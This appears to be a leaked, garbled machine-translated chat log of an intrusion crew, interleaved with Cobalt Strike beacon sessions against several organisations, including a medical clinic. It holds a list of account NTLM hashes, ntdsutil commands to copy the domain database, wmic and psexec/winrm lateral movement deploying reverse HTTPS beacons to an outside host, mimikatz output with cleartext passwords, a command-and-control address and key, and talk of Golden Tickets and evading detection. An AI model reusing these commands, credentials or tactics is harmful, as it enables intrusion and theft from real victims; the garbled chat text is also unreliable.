1775 MEDTRANS30$ d82e98e8f2a6e8c61b354e23de0122b2 4098
1607 gdhoff 86f6f2a7d63c02a5e599b1f921fe3ed3 512
2184 MEDTRANS28$ 6ba60bc00f1be322456fce022f1665ce 4098
1381 jkummrow 1b5b791b7e471036ce91137bc46d7386 512
1389 jrosin e05b3ccb827fc73e848e2e0646cd7a67 512
1728 OBPEDSAPPT02$ 23449777b9231d2d628efb4e47036d2c 4098
1173 rhammer b62f335f1eb14d11d05b7907baebb25b 544
1690 MEDTRANS27$ e0019570012f7329ccb2bd5e325fca95 4098
2178 WINSCRIBE$ 71d4de1e32f49a3ae2fbf8eb9e786db9 4098
1498 bhensch 916e7c5dfbec96e4d35447cb6b8f806e 512
1391 vmlink 08fdb4e2e1079a9a4a945028b6ab145a 66048
1179 sadavis 29891948443c85202ac9577e9e697e39 66080
2108 OBPEDS01$ 5f2193fb711f90a25eb7c8c399076d37 4098
1657 INSURANCE10$ e262ea6b7c8dad65f3f8e58eff54a898 4096
1387 mrloomer 57ea43193566ca1253347cd3afc1adb4 512
2654 bmschaible 67613f04680f8da46b2e6579a5205e46 66048
1135 cschmidt 37f1101464c66c68e5c512f9e1491fe7 544
2162 ORTHO01$ d338616df9cc1d70fa2e08e172315675 4096
1727 ffmaas 5cadeb11a161c1a7417ba56926de364c 66048
3111 nlppreston b80247b675268f128aadab632bdfcbab 66048
1739 juliannegutzmer 3f9bfd262caed9b0918ff698f290d982 512
1738 DR-GUTZMER$ 519cef4a3d321df140ad54821a2a7497 4096
1715 ffmbbs f06a94213f76b2f61caec468d45dfca4 66048
1716 ffmccs d10b57d2c5e69612b00c5c82121ce63f 66048
1719 MEDRECORDS11$ d0cb151bf2325184a0de92cf4e3e6248 4098
1710 MEDRECORDS07$ a4687be951806e156685748ba68233ed 4098
2167 TEMP02$ f3f68ee581369da5d6d1072387d062c1 4096
1537 KINETX$ 0e2b2c7d94ba335b9e6c80064d863043 4096
1197 mjacobson 83dc1589b41accbc0d5f04fd6aad4630 66080
1480 ADMIN03$ 0a73059f17e014e9172d8ffb138ceb85 4096
2158 QI01$ 58bab78a3981f067f8b2f12081b0635e 4098
1787 mardelle2 2297d8cf9db7ef8e80db486710b082c6 512
2636 jcbengtson 71c261a2f43ffe580f929d63cc07f70c 66048
1637 jdpeterson 4f48102cd374701781ed3036f4f83829 66048
1613 ADMIN07$ bd487166d574a7d1d59bd4fea97dc7a1 4098
2155 ADMIN05$ 266291d521f651cefcc7277fc25b3cb2 4098
2202 CLINICDC2$ be3a8c6316fbc0d4a155218bc4a93bae 4096
1446 replicadb 3b89729a25618c03434dc1275fe496ef 66048
1439 REPLICA$ 3d57307d1f18c68e42f4fcbabaeae4be 4096
1438 REPLICAFS1$ 310cd89aa1613a6a62349fcef6241d8f 4096
1576 LIGHTSPEED$ c7c102c07f6595952417b47b5f997412 4096
2126 IWAM_CLINIC2 686fd72eb5e43917c12bb5d41e7d1571 66080
2640 slmontella 339a9f43281e1d64712917d8b34ab34e 66048
1532 bjfindley 4fa0eb1764110e17db8dca13083c9df4 66048
1181 skilde 963c613cd50f2329f8eb925269a4b629 544
1583 ambetlach bfb0556340211875cd1cfc20e151aa69 66048
1493 ADMIN01$ e963b81b5a2f9242cd78d52d4d1e99f0 4096
1199 kpeterson 5b4c6335673a75f13ed948e848f00840 66080
1195 dktoso 69cb9baf0f396225965fd96c89102c92 544
1278 ldsander e2a2964ed651c0f7ba4ec81dd01e02aa 544
1137 dmanderson 07777311adb9fea327708e8b1ff840ea 66080
1555 smrodriguez afde914ef03a7f99c1e400d70451a5c2 66048
2638 kjbockman 5cb6367e176a3a44fd38aac5e1a51d 66048
1377 CLINIC2$ 660b3b39a9c4bd6420f0718d6d26cd80 532480
2125 IUSR_CLINIC2$ 5065cfab3c248199d577f2ca163213e6 66080
1785 smwhite 79689536e1dc2b70ae72862d77f966e6 66048
1154 jrdimke 1384e297265d100a0116e95f6b08d484 66080
3109 nrgeiszler 2a537afe9be53ebfabebf00c5b7c0c56 66048
1760 paragonrunner 03cc1b1a34914c14a3a44d06aab0a01b 66048
1554 sdthormodson 9e0add2cee1b4c84a7bb6d39456b32f3 66048
502 krbtgt bc039777432092c373c4760ae8907cbc 514
1001 SUPPORT_388945a0 f72f792aaf39648489e5865c72fd763a 66048
1664 petekuttera e65e7043f9e8c2321284f39e830a51ba 512
1184 tkadmin 81199155c72235ba7ee1e4b39da00702 544
1665 glendahoffa 94de31b62705ce9e325a95982e42752c 512
1003 beadmin ee32e572565734a3322bbd2fd90fd750 66048
2655 allscriptsadmin a1b22e43fe47976bb230e1e3497576bf 66048
2657 SophosSAUCLINICDCaa 1c1095437ae57d2ba6234c2615241519 66048
1550 mmlaugtug cfe2ff7138ac7cdc3ff264ea8b2a2e20 66048
1820 LRHC$ dd20d36f182fee4dad615eee4384046f 2080
2201 CLINICDC$ 690e62a948fd60c5c42cfddacdfeb106 532480
2656 PAULSANDERSON$ e6b7f965ec1dff907e9e9ee6158e4f10 4096
1004 CLINIC$ 174b5ffdef84b0c4b86f9ad41bface94 4096
1242 psanderson 8a48ebb4e8aadeb8f71b999ba84ab520 66080
2145 AUDIOLOGY2$ 6e02b8d4411ecbde4d04abad2d097bfb 4096
1189 WinScribe 3d1a6aecc94c7ca42f1687fe84466dc3 66080
1255 lkkrog a420b3f79ddc9eaa1155897dbac8ae7a 66080
1425 dastone 38abadb3519dc46f5290da34e1edb7f8 66048
1220 ljbecker 712eac9ea2f2a45f40d1e2b13bbf1d5d 66080
1148 jcjohnson 792508dbd7d9693b9e7ce078e9c43885 66080
1186 tleliason af61440f9a461322e1c2fc7b5e0c28de 66080
500 Administrator 8cb7e0d1806e8bb55dee9954e2d8bdfd 66048

``Everything works okcredits but the session does not arrivenu there is a quarantine still+yet even server 2000 it is the last impregnable trust? in this trust all XP and 2003vot so there dk 2003 x32? seriously?but it worked fine and in the input domain was sofossofos in all the trusts what os? and the text is shifting itself like this just sit there is a line transfer? check it in the batcik it is yes i copied here crookedly2) where is the last q?
```
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
``1) check if ntdsutil.exe is not complete
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:26:49> shell type \\CLINICDC\C$\toddcommands\1.txt
[*] Tasked beacon to run: type \\\CLINICDC\C$\toddcommands\1.txt
[+] host called home, sent: 68 bytes
[+] received output:
ntdsutil: ac in ntds
Error 80070057 parsing input - illegal syntax?
ntdsutil: ifm
Error 80070057 parsing input - illegal syntax?
ntdsutil: cr fu c:\toddcommands\ntds
Error 80070057 parsing input - illegal syntax?
ntdsutil: q

``now again puneomotecheck if the service is disconnected and the assumption was made that we have only redirected to the file browser and also to begin with show the outputIt happens that ntds catches an error or something else then the path is more complicated what does thetasklist say?there's someone stop the service through the file browser and I don't see the command dir c:\windows\temp\nds and the easiest way to find out what's wrong is to redirect the command to the file on the desktop.
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:14> shell sc \CLINICDC query vss
[*] Tasked beacon to run: sc \\CLINICDC query vss
[+] host called home, sent: 54 bytes
[+] received output:

SERVICE_NAME : vss
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 1 STOPPED
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:30> shell sc \CLINICDC start vss
[*] Tasked beacon to run: sc \\\CLINICDC start vss
[+] host called home, sent: 54 bytes
[+] received output:

SERVICE_NAME : vss
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 2 START_PENDING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0
        PID : 53772
        FLAGS :

Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:49> shell sc \CLINICDC query vss
[*] Tasked beacon to run: sc \\\CLINICDC query vss
[+] host called home, sent: 54 bytes
[+] received output:

SERVICE_NAME : vss
        TYPE : 10 WIN32_OWN_PROCESS
        STATE : 4 RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT : 0x0
        WAIT_HINT : 0x0

``qw.bat
```
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
``````
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:10:53> shell wmic /node:CLINICDC process call create "cmd /c C:\qw.bat"
[*] Tasked beacon to run: wmic /node:CLINICDC process call create "cmd /c C:\qw.bat"
[+] host called home, sent: 89 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 56968;
	ReturnValue = 0;
};

``Schaa well smirivsm? Let's not predictionsa folder no chota do as I shot remotely of course)) and then the dk in the coba does not stretch? through ntds realistic to shoot if there is LA on dk@tl1horoshoda-so such computers that `Destination host unreachable`, leave alone?
Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Ping from onehost not responding from all machines is not responding ok? From another machine may not responding from "destination host not responding" from another machine is not responding from another host saying that the host you are requesting is not found.
beacon> shell ping NSTORE0.mcklrh.mig
[*] Tasked beacon to run: ping NSTORE0.mcklrh.mig
[+] host called home, sent: 54 bytes
[+] received output:

Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data:
Reply from 192.168.254.92: Destination host unreachable.
Reply from 192.168.254.92: Destination host unreachable.
Reply from 192.168.254.92: Destination host unreachable.

[+] received output:
Reply from 192.168.254.92: Destination host unreachable.

Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
beacon> shell dir \\192.168.254.110\C$
[*] Tasked beacon to run: dir \192.168.254.110\C$
[+] host called home, sent: 55 bytes
[+] received output:
The network path was not found.
```
```
beacon> jump winrm 192.168.254.110
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 192.168.254.110 via WinRM
[+] host called home, sent: 194407 bytes
[-] Could not connect to pipe: 53
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">[192.168.254.110] Connecting to remote server failed with the following error m_x000D__x000A_</S><S S="Error">essage : The WinRM client cannot process the request. Default authentication ma_x000D__x000A_</S><S S="Error">y be used with an IP address under the following conditions: the transport is H_x000D__x000A_</S><S S="Error">TTPS or the destination is in the TrustedHosts list, and explicit credentials a_x000D__x000A_</S><S S="Error">re provided. Use winrm.cmd to configure TrustedHosts. Note that computers in th_x000D__x000A_</S><S S="Error">e TrustedHosts list might not be authenticated. For more information on how to _x000D__x000A_</S><S S="Error">set TrustedHosts run the following command: winrm help config. For more informa_x000D__x000A_</S><S S="Error">tion, see the about_Remote_Troubleshooting Help topic._x000D__x000A_</S><S S="Error"> + CategoryInfo : OpenError: (:) [], PSRemotingTransportException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : PSSessionStateBroken_x000D__x000A_</S></Objs>
 
beacon> jump winrm 192.168.254.110 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via WinRM
[+] host called home, sent: 198121 bytes
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">[192.168.254.110] Connecting to remote server failed with the following error m_x000D__x000A_</S><S S="Error">essage : The WinRM client cannot process the request. Default authentication ma_x000D__x000A_</S><S S="Error">y be used with an IP address under the following conditions: the transport is H_x000D__x000A_</S><S S="Error">TTPS or the destination is in the TrustedHosts list, and explicit credentials a_x000D__x000A_</S><S S="Error">re provided. Use winrm.cmd to configure TrustedHosts. Note that computers in th_x000D__x000A_</S><S S="Error">e TrustedHosts list might not be authenticated. For more information on how to _x000D__x000A_</S><S S="Error">set TrustedHosts run the following command: winrm help config. For more informa_x000D__x000A_</S><S S="Error">tion, see the about_Remote_Troubleshooting Help topic._x000D__x000A_</S><S S="Error"> + CategoryInfo : OpenError: (:) [], PSRemotingTransportException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : PSSessionStateBroken_x000D__x000A_</S></Objs>
```
```
beacon> jump psexec 192.168.254.110 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via Service Control Manager (\\\192.168.254.110\ADMIN$\bd450eb.exe)
[+] host called home, sent: 287818 bytes
[-] could not upload file: 53
[-] Could not open service control manager on 192.168.254.110: 1722
 
beacon> jump psexec 192.168.254.110 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 192.168.254.110 via Service Control Manager (\\192.168.254.110\ADMIN$\05ebb47.exe)
[+] host called home, sent: 287872 bytes
[-] could not upload file: 53
[-] Could not open service control manager on 192.168.254.110: 1722
[-] Could not connect to pipe: 53
Give me the command and output the full output.
Reply from 192.168.254.92: Destination host unreachable.

Ping statistics for 192.168.254.110:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

If it was resolved normally before then, does that mean the host is offline? What should I do with it? It's logical that no ping or httpsjump doesn't work@tl1
If a host on a ping
```
Destination host unreachable
```
and when I ask for a dir
```
The network path was not found.
```
is it realistic to pull it in at all?
```
Msf::OptionValidateError One or more options failed to validate: RHOSTS.
`tu ta, he off status does not change in any way @user3 where? emho mc17 knocked in that domain :thinking:checked rights in this domainto and smb_login also did soProbably I understand if it by ip pulls cars from current domain on 1-2 hosts not sure but it is worth trying in smb_login can specify hostname instead of ip in rhosts? so and yet try to try not
\\10.5.50.192\
а
\\Maybe just ping the hostname instead of \audiology2.ffmg.local\and maybe just ping the hostname?:thinking:compare results with the one from the vulnerable one and from there ping another host from that domain ping the one you want and ping it through the one I showed you above.
[*] 10.5.50.192:445 - Output for "net localgroup administrators":

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
FFMG\Domain Admins
FFMG\psanderson
LRHC\pdsanderson
The command completed successfully.
``This was pulling
```
paulsanderson.ffmg.local [10.10.220.45]
>operatingSystem: Windows XP Professional
```
it came up with this
```
Host Name: LRH001240
OS Name: Microsoft Windows 10 Pro
Registered Owner: lrhc
 
 
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
LRHC\Domain Admins
LRHC/Nessus Local Access
LRHC\Paragon_Users
``Did you pull syseminfo off the machine, is the hostname the one you pinged there? is the domain name full give an example of an addendum is hostnames how did you collect ipses here?
@echo off
setlocal enabledelayedexpansion
set OUTPUT_FILE=result.txt
>nul copy nul %OUTPUT_FILE%
echo HOSTNAME,LONGNAME,IPADDRESS,STATE >%OUTPUT_FILE%
for /f %%i in (ips.txt) do (
    set SERVER_ADDRESS_I=UNRESOLVED
    set SERVER_ADDRESS_L=UNRESOLVED
    for /f "tokens=1,2,3" %%x in ('ping -n 1 -a %%i ^&^& echo SERVER_IS_UP') do (
    if %%x==Ping set SERVER_ADDRESS_L=%y
    if %%x==Ping set SERVER_ADDRESS_I=%%z
        if %%x==SERVER_IS_UP (set SERVER_STATE=UP) else (set SERVER_STATE=DOWN)
    )
    echo %%i [!SERVER_ADDRESS_L::=!]
    echo %%i,!SERVER_ADDRESS_L::=!,!SERVER_ADDRESS_I::=!,!SERVER_STATE! >>%OUTPUT_FILE%
)
how did you ping hosts from trust? I'm talking about it,are you in trust domain? although in trust domain 10ok net systeminfo says there are 10 vindatk net domain in them gives out the current domain there is a suspicion that the cars in the current and trust domain match ipi and therefore cars from the current domain are pulled smb_logney can specify the hostname instead of ipi?check also the processes, os, avi t if not servers, then browsers check more processes[ ](https://mediaeveryone.com/group/lrhc-org?msg=mhrk8J5bowbKdJ4hp) some of them are not attracted, and those that are attracted, no cracks at all
```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
[-] no results.
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
``user3 to and from the dedicator Copy not directly load through the kobone in what, just clarifying. archiver will pass in what problem? KB How to treat file download? It is necessary to download an exe to download the archive from ff. Is there info? I mean, it's worth a try, there is no alternative) well, such ... not that "wildly" noisy there are LA Credits on one of the servers) want to run sharfinder, it's noisy?, leave for half an hour I know that you can pull browsers if it's ff) there's still a sphere
We're not noisy yet, we're walking the net gently.
but without noise we can not get the crescendos from the sphere, so that on the day of closing we'll have to look for the sphere at once)~9 am, then for it is more likely to allocate the morning + I am so, to be aware of this particular one can move the network is still not ready for closing `` ``
The current time at \HJ-PRT-AZPROD.evo.local is 1/6/2021 8:54:24 AM

```
I think our default time to start at 03:00 here is not very suitable.  At 3 am - will be 16 days.Yes, and the network is not as bigtam admin vigil my respectMaybe even on the system are runes from the evil eyeThat thing they have https://redcanary.com/ `` ``
192.168.9.251:445 (platform: 500 version: 6.2 name: EPSON1BBE6E domain: WORKGROUP)
192.168.9.102:445 (platform: 500 version: 5.0 name: DOCKPRT domain: WORKGROUP ) EPSON WF-3540 Series
192.168.9.138:445 (platform: 500 version: 4.9 name: DC_CRTV_NAS1 domain: WORKGROUP) https://www.promise.com/Policy
it also has a tendency to detekeneeneene refuse vmikai as soon as you start will go back report without the possibility to interrupt the process just need to do when no one before closing can noise) Prepare a network taka how to get Codes then?) kb most likely noticed by Golden Ticket katintds, dxink us not to remove?
from the entry point under the vpnS-1-5-21-2479520119-439608908-2710113943user9[ ](https://mediaeveryone.com/group/evo-com?msg=juRtha4EjgGzs368R) In the chat room did not find the unlikely to change there krbttgolden ticket do iten I remember you ntds threw? can consult with colleagues while you have thoughts - doThe only thing that comes to mind, check through msf for holes... I have no experience with this situation (to raise the rights) to what? You have changed tasks while you work here, then do not validate where to roll check on the dk` ``
scanuser abc123$ - VALID FOR DC
work only from the entry pointChecked all the creeds (I mean if you use ms17 depending on how you set upMSF also burns fast Kb Right? Yes, I checked folders. folder? should have looked at processes and ctrl+f cb.exe)[ ](https://mediaeveryone.com/group/evo-com?msg=4yn2FwMFtnBJDw3yy) checked the wrong folder and jumped for joy (try again raise the rights for nothing you then climb.... the passwords changed + Captured the sheet as you raise the load give me a load```
172.93.201.193
https://keymiss.com
----------------------------------------------------------------------------------------
104.243.45.15:59880
Qlxso4SdwP3QODfp9NHqoxUb1qXy6OaeLka
``I'll give you a replacement, then we'll kick you out for 2 days maximum along with this one. So they're looking for our entry point. So they've worked off the Buy More...EVO.LOCAL what's your cob...EVO.LOCAL what's your domain?
```
  UserName : richards@continuant.com
  Password : MyW0rdPassW0rd!
``Now I need credentials to connect to the vpnUnlocked that sofos and opn vpn are the sameuser4user1pazhalustokin @user1 here:zany_face:and there's 6 hours there seemed idle time 0 hours 50 minutes stopmy guess they turned off the vpn for lunch there time 01:43 PM```
====== IdleTime ======

  CurrentUser : NT AUTHORITY\SYSTEM
  Idletime : 06h:50m:34s:109ms (1234234109 milliseconds)
``On the other computer TOSA is LA''.
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9f42fb1ba6b3f4d6eb0ee00efb127225:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Teddybear:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TOSA:1002:aad3b435b51404eeaad3b435b51404ee:bc89b78c7c12fd09c32b057a8e6d9ea6:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fc6774e019e6b30db2715b90caa59d97:::
``````
Authentication Id : 0 ; 2182928437 (00000000:821cd835)
Session : NewCredentials from 0
User Name : richards
Domain : TELECOMLABSINC
Logon Server : (null)
Logon Time : 10/20/2020 11:08:16 AM
SID : S-1-5-21-2126783548-1955098733-1885625156-12800
	msv :
	 [00000003] Primary
	 * Username : Guest
	 * Domain : .
	 * NTLM : 3d2b4dfac512b7ef6188248b8e113cb9
	 * SHA1 : bc7d6d066111172ffd532d3de3967638b3f2c4b8ce
	 * DPAPI : 7def96ac9eab53c5eedb2fe0c01bb5d8
	tspkg :
	wdigest :
	 * Username : Guest
	 * Domain : (null)
	 * Password : (null)
	kerberos :
	 * Username : Guest
	 * Domain : (null)
	 * Password : Guest
	ssp :
	credman :

Authentication Id : 0 ; 3241371 (00000000:0031759b)
Session : Interactive from 1
User Name : richards
Domain : TELECOMLABSINC
Logon Server : FIFE-DC01
Logon Time : 10/6/2020 6:58:15 AM
SID : S-1-5-21-2126783548-1955098733-1885625156-12800
	msv :
	 [00000003] Primary
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * NTLM : 28c269c13bc52e3173e95e32a3b59086
	 * SHA1 : 2c4f93e65137e41d0d0726b29b75163e65d093b2
	 * DPAPI : 7d405a8c6affa51928af3bdf7ce47276
	tspkg :
	wdigest :
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : richards
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :
	 [00000000]
	 * Username : richards@continuant.com
	 * Domain : autologon.microsoftazuread-sso.com
	 * Password : MyW0rdPassW0rd!

Authentication Id : 0 ; 3239772 (00000000:00316f5c)
Session : Interactive from 1
User Name : richards
Domain : TELECOMLABSINC
Logon Server : FIFE-DC01
Logon Time : 10/6/2020 6:58:15 AM
SID : S-1-5-21-2126783548-1955098733-1885625156-12800
	msv :
	 [00000003] Primary
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * NTLM : 28c269c13bc52e3173e95e32a3b59086
	 * SHA1 : 2c4f93e65137e41d0d0726b29b75163e65d093b2
	 * DPAPI : 7d405a8c6affa51928af3bdf7ce47276
	tspkg :
	wdigest :
	 * Username : richards
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : richards
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :
	 [00000000]
	 * Username : richards@continuant.com
	 * Domain : autologon.microsoftazuread-sso.com
	 * Password : MyW0rdPassW0rd!

Authentication Id : 0 ; 102596 (00000000:000190c4)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 881a8b31fa3a3a2ffc06751e5ada89c1
	 * SHA1 : 782d12bcee0c5aa3bf6d0cc98b32705ff7f5194e
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : c5 5c 13 59 42 d3 fa e2 e3 c8 50 7a 73 0d e4 14 17 fb 1f 9c ac f9 56 68 59 52 81 3e 01 d7 13 af 10 59 ca e2 74 c3 d1 34 b9 b8 ea 67 f7 59 39 ad 5e ad ed c5 4e f0 ec 8a c0 47 aa 88 8a 95 68 77 ba e2 93 b0 5c 0b 1b 1f e3 24 b8 6d 27 21 48 ad af 36 24 4d ee 57 52 5d 5d 91 64 26 7d a9 be 4b c3 1b 3a 94 f8 c4 69 6b 3a 97 95 ef 3b ce 78 2d a6 48 c2 ce 6b 64 ce 06 e5 14 a8 6a 5a 0c de b0 24 e6 78 8e 36 75 76 a0 d4 96 a1 99 c8 8d 6f 02 1c 12 e1 a2 ee c1 78 8e a0 a4 20 62 c5 48 9c 30 60 12 7f c6 7f cd 28 6c 5f b6 77 91 85 a2 d3 54 fb 83 c0 54 a5 9b f5 4b ec 0a f4 0d ec 4a 1b 65 51 59 ab 4c 60 73 1f 84 fb af 90 92 35 8c a2 ec 3b f8 99 c9 27 a3 d2 50 a8 19 e5 92 b6 a5 22 8f 5c 3f b0 85 56 0d 80 41 51 78 17 88 cb 60 1d a0
	ssp :
	credman :

Authentication Id : 0 ; 102551 (00000000:00019097)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f
	ssp :
	credman :

Authentication Id : 0 ; 97351 (00000000:00017c47)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-96-0-1
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : L-7NB3HC2$
	 * Domain : telecomlabsinc.com
	 * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f
	ssp :
	credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : L-7NB3HC2$
Domain : TELECOMLABSINC
Logon Server : (null)
Logon Time : 10/6/2020 6:55:40 AM
SID : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e
	 * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a
	tspkg :
	wdigest :
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
	 * Password : (null)
	kerberos :
	 * Username : l-7nb3hc2$
	 * Domain : TELECOMLABSINC.COM
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	* kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 66921 (00000000:00010569)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/6/2020 6:55:39 AM
SID : S-1-5-96-0-0
	msv :
	 [00000003] Primary
	 * Username : L-7NB3HC2$
	 * Domain : TELECOMLABSINC
